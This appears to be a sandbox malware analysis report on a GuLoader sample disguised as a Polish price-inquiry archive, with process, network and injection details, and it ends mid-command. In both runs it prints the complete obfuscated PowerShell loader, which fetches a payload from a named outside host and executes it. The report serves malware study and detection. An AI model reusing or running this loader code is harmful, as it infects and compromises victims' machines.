Malware Analysis Report

2024-10-18 23:07

Sample ID 240709-r6ptaazhrh
Target FV-452747284 INTERPLUS Zapytanie o cenę arbejdsmetodes.7z
SHA256 7de13a9108d510ad39087daae6c4f2c0a23972f3760962b805a08ca4c79e0954
Tags
execution guloader downloader
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

7de13a9108d510ad39087daae6c4f2c0a23972f3760962b805a08ca4c79e0954

Threat Level: Known bad

The file FV-452747284 INTERPLUS Zapytanie o cenę arbejdsmetodes.7z was found to be: Known bad.

Malicious Activity Summary

execution guloader downloader

Guloader,Cloudeye

Command and Scripting Interpreter: PowerShell

Blocklisted process makes network request

Suspicious use of NtSetInformationThreadHideFromDebugger

Suspicious use of SetThreadContext

Suspicious use of NtCreateThreadExHideFromDebugger

Program crash

Suspicious behavior: MapViewOfSection

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-07-09 14:48

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-07-09 14:48

Reported

2024-07-09 14:51

Platform

win7-20240705-en

Max time kernel

147s

Max time network

150s

Command Line

cmd /c "C:\Users\Admin\AppData\Local\Temp\FV-452747284 INTERPLUS Zapytanie o cenę arbejdsmetodes.bat"

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\FV-452747284 INTERPLUS Zapytanie o cenę arbejdsmetodes.bat"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -windowstyle hidden "cls;write 'Decisionen Landbrugsmssiges Sapremia157 Tandemcykels nucleli Isopropenyl Albatroserne Granden Udbredes Fluesnapperen Sideloebende Ernestines Karakterbristernes Unprejudice Udsigelsen Moonward Hovedbanegaarde Fremskridtsbyerne Sildigste Readaptable Rendyrkede Opprobriated Protococcal Hjlpefunktioners Decisionen Landbrugsmssiges Sapremia157 Tandemcykels nucleli Isopropenyl Albatroserne Granden Udbredes Fluesnapperen Sideloebende Ernestines Karakterbristernes Unprejudice Udsigelsen Moonward Hovedbanegaarde Fremskridtsbyerne Sildigste Readaptable Rendyrkede Opprobriated Protococcal Hjlpefunktioners';If (${host}.CurrentCulture) {$Cabalismsbryderens++;}Function Antikvitetsforretnings($Rodfunktionerne){$Byggeforetagenders156=$Rodfunktionerne.Length-$Cabalismsbryderens;$Sinecural='SUBsTR';$Sinecural+='ing';For( $Cabalism=4;$Cabalism -lt $Byggeforetagenders156;$Cabalism+=5){$Decisionen+=$Rodfunktionerne.$Sinecural.Invoke( $Cabalism, $Cabalismsbryderens);}$Decisionen;}function Unthrust($Meagrely){ . ($Eksperter) ($Meagrely);}$Antoninas=Antikvitetsforretnings 'DittMCineofutizantiisammlCarblMorpaudny/Illi5fa g.Chec0Subc .ul(UbehW Ae,istrinConvd HanoFr kwNyvlsDiat EmbrNTocoT Gli Conv1 ,dd0Klip.Sena0Bald; S h ForeWR,triRe,ongenn6S,ol4 Opt;.avi Strx,erm6Mod,4Stal; Far BaglrOstevSla,:Inqi1akti2 Fed1.mrk. g,t0,esk)Kamg DebGNatie,atrcskank Rono reh/Vrts2 aft0Komp1 Jrv0ort.0.ini1atla0Ek,k1,nth UdliFTizwiCadirAlomeGenaf,oreoegesxA,at/Omr.1ma,d2Vol 1 Unr.Fort0Home ';$Torumslejligheds=Antikvitetsforretnings 'BigwU Py,sBabbeVarmrDisp-ForeA LaggLutheLysenO.detEl,n ';$nucleli=Antikvitetsforretnings 'Fa,ah nkatDe otFe.lp,borsInhi:No p/Spek/AageeBuescSidsoPsyknOnd,s CuttNipsr EriaResem.tyreHybrdFeroi aanaOve .denacJagaoNondm Ku /UndeT.ncoe.ortgOut,lSinubHvalrClavnHilldEmpoe OddrEnkeiFanteDelerSail.FervsScrinS enpC re ';$Udarte=Antikvitetsforretnings 'Hytt>Sony ';$Eksperter=Antikvitetsforretnings 'GuttiVirke,trexScor ';$Arabin='Granden';$Martinetishness = Antikvitetsforretnings 'Vande H.wcAabehroeroUdtr Dec%S,lda B,upReg,pOv,rd Ek.aProvtD.coaDung%Cavi\,uviCkontoPreduKonsm niaAut rA bea F rtUnheeWelf. autBBe.aiD bbcAl m Sta&Mask& ual heale Ti.c Pl,hVippo Biv SynttL uc ';Unthrust (Antikvitetsforretnings 'Maxi$Em,og .ncl B ioH.rsbSlutaIntel Pol:It,mM,opeeDru.tBegialendl OstiTeltsSkrumSwad= Oms(Reloc.sonmAntedFore Sage/EmbacZibe Efte$DeprMP,ntaUdfrrB,sittissiZircnTu.sePosstSkovi sa sMasshU.banDesiePertsHimmsOver)brne ');Unthrust (Antikvitetsforretnings 'Un t$PopugOdiolNylooH,peb umpabgeblNucl:CranTConca VannO.ttdTo,seOpdrmAp,rcAnisy.etvkUnroeFamilL.ngsG st=,erv$S udnIndsulikvcFriglSatseBastlJakoiIsot. ConsUninpSa.vl hiciAnsttbort( Jer$ nopUCystdAnglaHerirRelit dukeDisp).run ');Unthrust (Antikvitetsforretnings ' ret[D,osNRecre PemtFarb.EnmeS,aboeKlynrVi,tvIkeyiudsvcPremeP ckPUniooDespiBrevnScletK nsM SieaRe snHjemaNonvgKlaseAfter.too] ,is:Paam: SupS St ePanccMicruMilirK.umiWafft irtyArguPMortrpr goBecotCutao BlocBo uoEufolspri C.nc=.ldr Geni[Ret.NKl,ke ertpost.S raS nteeDmp cBayouRgrirColliMorttBibly TilPBis r humoVenttPrteo Q acF nkoBetllUterT RawyUnnepScraeGste]K nd: Rom:SkurTMar lHjems Gul1 Slu2P,as ');$nucleli=$Tandemcykels[0];$Akkompagnatr142= (Antikvitetsforretnings 'Skra$ Ky.g UnflKl bo,nhobTapaaRelalHexa:run.LAtteeDuchntrkas,ydfbBaana.efrr Dr oFanen ProeHaphr MonsAabe=hausNDgndeDankw .ur-KalkO,ehebKredjPr sePrimc TestNont CoedS SnoyHemisDis,tS beeTrkpmSwop.H,stNLadde AartUdle.TrykWNarse Sl,bHj.pCoverl UdliBeroe TvenGlutt');$Akkompagnatr142+=$Metalism[1];Unthrust ($Akkompagnatr142);Unthrust (Antikvitetsforretnings 'se,v$L tlLPsyceFoinnBuresParab Va,aBundr S aoJordnTaute,oler,leksRati.g zpH.illeGrnsaUnded NoneDe.prStems Lg.[Phyt$.sycT tonoForsrUndiuAfs mVelbsPreslFelteLovejCenolCardi FoegSa.ghErhve Le dForus O,e]Revo=Sama$OpbiASkranWhimt Svno U,cnakvaiIsthnUdd aSukks Fun ');$barser=Antikvitetsforretnings 'Elev$AfgiLEccle AponAntrsYpp.b StoaYardrKvleoBangnUnteeKedlr O.es Dob.Em lDFortoK plw .avnAn,alud,ao,ilkaspend.rifF Un.i nylKr,meAnsg(Fl g$ZealnEndruAlvec en,lCa eeCa.alAfhsiSpu,,unde$InteOTe,ipForupTr gr fusoFustbGeorrAr,eiPeriaDirkt Usue RhedI.fo)Nonu ';$Opprobriated=$Metalism[0];Unthrust (Antikvitetsforretnings 'Cohe$H,nkgChenl.paroDiabbelseaDyrelRema: TiqRResse.indcHyphi rketRothe Sno=B.ie(PladTsubieDiaksUnretGrun-DeflPRumlaanaltWenchS.mp Skol$ tr,OSuccppilopantirDemioSammb Pror ini NonaPseltUncoe Tvrd Non)Ax,l ');while (!$Recite) {Unthrust (Antikvitetsforretnings 'Pans$Bilpg AtalAddyoEp cbWalda enilT,eo: OliFGelioCheerAfhrmH.ndgTilriTrafvFun,eSjasrUndee elp=B sa$GodttSi.orBooguCitae Ele ') ;Unthrust $barser;Unthrust (Antikvitetsforretnings '.ropSPrivt,ondaincorMi rtScor- ResSRteblS aseFor,eOp,lpRes Lip.4 ,il ');Unthrust (Antikvitetsforretnings ' tal$Ara gUnofl slaoNedkb ubaArvelAnte:linoRModte,olyc,itriFr.ttCapaebark= Gra( SheTVandeHu.dsUdfrt ,or-UnsiP ermavisstByelhHjer .nt$DecaO CripProlpElmir,nvlo SlabUntirBerriFedta Sprt SimeTangd,ifi)Gend ') ;Unthrust (Antikvitetsforretnings 'Ro,e$Spilg isjlPn.uo PrebOocya RevlAthl:PalmSSealafettpSlutrqu teLipomDomeivirgaRe,i1Dolo5Fler7Ra,n=emot$Brkeg NublMonaoCmrebSteaaBo glOver:C oiLDuk,aAasen VatdUndebD cirSpaduB.lmgS.iss Cazm PyosInstsPr,tilacigGutteUdsus ega+ Noe+T,bu%W ne$ Ri T Homanoncn Ma.d WanegrilmRo.fcNulpyB rokColoe cral ints,eso.Presc MitoBreauFlagnOvert F r ') ;$nucleli=$Tandemcykels[$Sapremia157];}$Hyacint=296268;$Shutterwise=28855;Unthrust (Antikvitetsforretnings 'Mast$GossgPoppl EndoimmabOpska,usel In,:AbraU lbid P sb N.nrSha eCh.mdCoareLuncs ou sge=Pret funkGUdd,eGrattOver-EnspC Arso BlonNasct Akae Klan watSa,t Fuzz$W,tcO.ocupundepDejlrSheaoPalebOsterBud.i.ispaForft FoseAcadd Fo ');Unthrust (Antikvitetsforretnings 'So,r$ MisgThrilTi so.prrbTrada aml.esk:ScypH Antnre.lsFl.geLin,a artvScenlS lkeSkvirFlgb Del=.mpe Sjle[GamoSBagay inisAccotDisseOrthmBa,y.RebuC,oneoA mrn astvJapaeg,rtrForutudre]Mirt: lo:Zo,aF D pr Mono.rotmJoveBProvaJa zs oite Bre6Be.l4InfaSSbeht AnerKooliov rnErytg R.d(Bril$MamlU BesdKes bSikkrEnc,e.ommd.arveMotisbagg),ndi ');Unthrust (Antikvitetsforretnings 'Ub.f$AnjagUmu,lrealoSkanbN tra re,lD kk:,ensEFrotr WelnArkaeNells QuatTraui D,snHov.eCam sBa.t Noe=Film Disr[SojaSOpskyMerlsUnfotNo,seG,ubmGuat.OyesTStdee Cr,xFordt dol.SvarEForln ColcDef,oKvetdHumbiSyltn WalgSe a]Klod:S rv:ProgALivsS venCAposIAnovIFilt.ScarGdokeeRespt .oaSModitSig,r illi kasn GlogLreb(Card$P,ncHD lanFor,scentePopuaSlusv usclDiskeLapirBal )Styr ');Unthrust (Antikvitetsforretnings 'Rumb$ RecgS,lvl PreoVarib N,paAnmelde,i:T.ttzAnthoSv.pb.verlTarde ,krn PlesHi,h=.alv$ UnmE,roorB,ndnRefreBn hsv,sttIndii ThenTe.lePinhsUrim.,ogfs Preu.hrebSporsSurrtSubsrReveiSignn z.ngUdsp(Fo,v$ diaHMessyTr.daOps,cAnslim stn eeltMart,Kont$ Fo.SOughhMit.uUntotFysitHat,eUnmorBu.lw FamiTutrsAdumePlan)Estr ');Unthrust $zoblens;"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Coumarate.Bic && echo t"

Network

Country Destination Domain Proto
US 8.8.8.8:53 econstramedia.com udp
IN 103.211.216.55:443 econstramedia.com tcp
IN 103.211.216.55:443 econstramedia.com tcp
IN 103.211.216.55:443 econstramedia.com tcp
IN 103.211.216.55:443 econstramedia.com tcp
IN 103.211.216.55:443 econstramedia.com tcp
IN 103.211.216.55:443 econstramedia.com tcp
IN 103.211.216.55:443 econstramedia.com tcp
IN 103.211.216.55:443 econstramedia.com tcp
IN 103.211.216.55:443 econstramedia.com tcp
IN 103.211.216.55:443 econstramedia.com tcp
IN 103.211.216.55:443 econstramedia.com tcp
IN 103.211.216.55:443 econstramedia.com tcp
IN 103.211.216.55:443 econstramedia.com tcp
IN 103.211.216.55:443 econstramedia.com tcp
IN 103.211.216.55:443 econstramedia.com tcp
IN 103.211.216.55:443 econstramedia.com tcp
IN 103.211.216.55:443 econstramedia.com tcp
IN 103.211.216.55:443 econstramedia.com tcp
IN 103.211.216.55:443 econstramedia.com tcp
IN 103.211.216.55:443 econstramedia.com tcp
IN 103.211.216.55:443 econstramedia.com tcp
IN 103.211.216.55:443 econstramedia.com tcp
IN 103.211.216.55:443 econstramedia.com tcp
IN 103.211.216.55:443 econstramedia.com tcp
IN 103.211.216.55:443 econstramedia.com tcp
IN 103.211.216.55:443 econstramedia.com tcp
IN 103.211.216.55:443 econstramedia.com tcp
IN 103.211.216.55:443 econstramedia.com tcp
IN 103.211.216.55:443 econstramedia.com tcp
IN 103.211.216.55:443 econstramedia.com tcp
IN 103.211.216.55:443 econstramedia.com tcp
IN 103.211.216.55:443 econstramedia.com tcp
IN 103.211.216.55:443 econstramedia.com tcp
IN 103.211.216.55:443 econstramedia.com tcp
IN 103.211.216.55:443 econstramedia.com tcp
IN 103.211.216.55:443 econstramedia.com tcp
IN 103.211.216.55:443 econstramedia.com tcp
IN 103.211.216.55:443 econstramedia.com tcp
IN 103.211.216.55:443 econstramedia.com tcp
IN 103.211.216.55:443 econstramedia.com tcp
IN 103.211.216.55:443 econstramedia.com tcp
IN 103.211.216.55:443 econstramedia.com tcp
IN 103.211.216.55:443 econstramedia.com tcp
IN 103.211.216.55:443 econstramedia.com tcp
IN 103.211.216.55:443 econstramedia.com tcp
IN 103.211.216.55:443 econstramedia.com tcp
IN 103.211.216.55:443 econstramedia.com tcp
IN 103.211.216.55:443 econstramedia.com tcp
IN 103.211.216.55:443 econstramedia.com tcp
IN 103.211.216.55:443 econstramedia.com tcp
IN 103.211.216.55:443 econstramedia.com tcp
IN 103.211.216.55:443 econstramedia.com tcp
IN 103.211.216.55:443 econstramedia.com tcp
IN 103.211.216.55:443 econstramedia.com tcp
IN 103.211.216.55:443 econstramedia.com tcp
IN 103.211.216.55:443 econstramedia.com tcp
IN 103.211.216.55:443 econstramedia.com tcp
IN 103.211.216.55:443 econstramedia.com tcp

Files

memory/1156-4-0x000007FEF627E000-0x000007FEF627F000-memory.dmp

memory/1156-5-0x000000001B590000-0x000000001B872000-memory.dmp

memory/1156-6-0x00000000027E0000-0x00000000027E8000-memory.dmp

memory/1156-7-0x000007FEF5FC0000-0x000007FEF695D000-memory.dmp

memory/1156-8-0x000007FEF5FC0000-0x000007FEF695D000-memory.dmp

memory/1156-9-0x000007FEF5FC0000-0x000007FEF695D000-memory.dmp

memory/1156-10-0x000007FEF5FC0000-0x000007FEF695D000-memory.dmp

memory/1156-11-0x000007FEF5FC0000-0x000007FEF695D000-memory.dmp

memory/1156-12-0x000007FEF627E000-0x000007FEF627F000-memory.dmp

memory/1156-13-0x000007FEF5FC0000-0x000007FEF695D000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-07-09 14:48

Reported

2024-07-09 14:51

Platform

win10v2004-20240704-en

Max time kernel

149s

Max time network

155s

Command Line

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\FV-452747284 INTERPLUS Zapytanie o cenę arbejdsmetodes.bat"

Signatures

Guloader,Cloudeye

downloader guloader

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of NtCreateThreadExHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 1288 set thread context of 2236 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Program Files (x86)\windows mail\wab.exe

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2224 wrote to memory of 2888 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2224 wrote to memory of 2888 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2888 wrote to memory of 4672 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 2888 wrote to memory of 4672 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 2888 wrote to memory of 1288 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 2888 wrote to memory of 1288 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 2888 wrote to memory of 1288 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 1288 wrote to memory of 228 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 1288 wrote to memory of 228 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 1288 wrote to memory of 228 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 1288 wrote to memory of 2236 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 1288 wrote to memory of 2236 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 1288 wrote to memory of 2236 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 1288 wrote to memory of 2236 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 1288 wrote to memory of 2236 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe

Processes

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\FV-452747284 INTERPLUS Zapytanie o cenę arbejdsmetodes.bat"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -windowstyle hidden "cls;write 'Decisionen Landbrugsmssiges Sapremia157 Tandemcykels nucleli Isopropenyl Albatroserne Granden Udbredes Fluesnapperen Sideloebende Ernestines Karakterbristernes Unprejudice Udsigelsen Moonward Hovedbanegaarde Fremskridtsbyerne Sildigste Readaptable Rendyrkede Opprobriated Protococcal Hjlpefunktioners Decisionen Landbrugsmssiges Sapremia157 Tandemcykels nucleli Isopropenyl Albatroserne Granden Udbredes Fluesnapperen Sideloebende Ernestines Karakterbristernes Unprejudice Udsigelsen Moonward Hovedbanegaarde Fremskridtsbyerne Sildigste Readaptable Rendyrkede Opprobriated Protococcal Hjlpefunktioners';If (${host}.CurrentCulture) {$Cabalismsbryderens++;}Function Antikvitetsforretnings($Rodfunktionerne){$Byggeforetagenders156=$Rodfunktionerne.Length-$Cabalismsbryderens;$Sinecural='SUBsTR';$Sinecural+='ing';For( $Cabalism=4;$Cabalism -lt $Byggeforetagenders156;$Cabalism+=5){$Decisionen+=$Rodfunktionerne.$Sinecural.Invoke( $Cabalism, $Cabalismsbryderens);}$Decisionen;}function Unthrust($Meagrely){ . ($Eksperter) ($Meagrely);}$Antoninas=Antikvitetsforretnings 'DittMCineofutizantiisammlCarblMorpaudny/Illi5fa g.Chec0Subc .ul(UbehW Ae,istrinConvd HanoFr kwNyvlsDiat EmbrNTocoT Gli Conv1 ,dd0Klip.Sena0Bald; S h ForeWR,triRe,ongenn6S,ol4 Opt;.avi Strx,erm6Mod,4Stal; Far BaglrOstevSla,:Inqi1akti2 Fed1.mrk. g,t0,esk)Kamg DebGNatie,atrcskank Rono reh/Vrts2 aft0Komp1 Jrv0ort.0.ini1atla0Ek,k1,nth UdliFTizwiCadirAlomeGenaf,oreoegesxA,at/Omr.1ma,d2Vol 1 Unr.Fort0Home ';$Torumslejligheds=Antikvitetsforretnings 'BigwU Py,sBabbeVarmrDisp-ForeA LaggLutheLysenO.detEl,n ';$nucleli=Antikvitetsforretnings 'Fa,ah nkatDe otFe.lp,borsInhi:No p/Spek/AageeBuescSidsoPsyknOnd,s CuttNipsr EriaResem.tyreHybrdFeroi aanaOve .denacJagaoNondm Ku /UndeT.ncoe.ortgOut,lSinubHvalrClavnHilldEmpoe OddrEnkeiFanteDelerSail.FervsScrinS enpC re ';$Udarte=Antikvitetsforretnings 'Hytt>Sony ';$Eksperter=Antikvitetsforretnings 'GuttiVirke,trexScor ';$Arabin='Granden';$Martinetishness = Antikvitetsforretnings 'Vande H.wcAabehroeroUdtr Dec%S,lda B,upReg,pOv,rd Ek.aProvtD.coaDung%Cavi\,uviCkontoPreduKonsm niaAut rA bea F rtUnheeWelf. autBBe.aiD bbcAl m Sta&Mask& ual heale Ti.c Pl,hVippo Biv SynttL uc ';Unthrust (Antikvitetsforretnings 'Maxi$Em,og .ncl B ioH.rsbSlutaIntel Pol:It,mM,opeeDru.tBegialendl OstiTeltsSkrumSwad= Oms(Reloc.sonmAntedFore Sage/EmbacZibe Efte$DeprMP,ntaUdfrrB,sittissiZircnTu.sePosstSkovi sa sMasshU.banDesiePertsHimmsOver)brne ');Unthrust (Antikvitetsforretnings 'Un t$PopugOdiolNylooH,peb umpabgeblNucl:CranTConca VannO.ttdTo,seOpdrmAp,rcAnisy.etvkUnroeFamilL.ngsG st=,erv$S udnIndsulikvcFriglSatseBastlJakoiIsot. ConsUninpSa.vl hiciAnsttbort( Jer$ nopUCystdAnglaHerirRelit dukeDisp).run ');Unthrust (Antikvitetsforretnings ' ret[D,osNRecre PemtFarb.EnmeS,aboeKlynrVi,tvIkeyiudsvcPremeP ckPUniooDespiBrevnScletK nsM SieaRe snHjemaNonvgKlaseAfter.too] ,is:Paam: SupS St ePanccMicruMilirK.umiWafft irtyArguPMortrpr goBecotCutao BlocBo uoEufolspri C.nc=.ldr Geni[Ret.NKl,ke ertpost.S raS nteeDmp cBayouRgrirColliMorttBibly TilPBis r humoVenttPrteo Q acF nkoBetllUterT RawyUnnepScraeGste]K nd: Rom:SkurTMar lHjems Gul1 Slu2P,as ');$nucleli=$Tandemcykels[0];$Akkompagnatr142= (Antikvitetsforretnings 'Skra$ Ky.g UnflKl bo,nhobTapaaRelalHexa:run.LAtteeDuchntrkas,ydfbBaana.efrr Dr oFanen ProeHaphr MonsAabe=hausNDgndeDankw .ur-KalkO,ehebKredjPr sePrimc TestNont CoedS SnoyHemisDis,tS beeTrkpmSwop.H,stNLadde AartUdle.TrykWNarse Sl,bHj.pCoverl UdliBeroe TvenGlutt');$Akkompagnatr142+=$Metalism[1];Unthrust ($Akkompagnatr142);Unthrust (Antikvitetsforretnings 'se,v$L tlLPsyceFoinnBuresParab Va,aBundr S aoJordnTaute,oler,leksRati.g zpH.illeGrnsaUnded NoneDe.prStems Lg.[Phyt$.sycT tonoForsrUndiuAfs mVelbsPreslFelteLovejCenolCardi FoegSa.ghErhve Le dForus O,e]Revo=Sama$OpbiASkranWhimt Svno U,cnakvaiIsthnUdd aSukks Fun ');$barser=Antikvitetsforretnings 'Elev$AfgiLEccle AponAntrsYpp.b StoaYardrKvleoBangnUnteeKedlr O.es Dob.Em lDFortoK plw .avnAn,alud,ao,ilkaspend.rifF Un.i nylKr,meAnsg(Fl g$ZealnEndruAlvec en,lCa eeCa.alAfhsiSpu,,unde$InteOTe,ipForupTr gr fusoFustbGeorrAr,eiPeriaDirkt Usue RhedI.fo)Nonu ';$Opprobriated=$Metalism[0];Unthrust (Antikvitetsforretnings 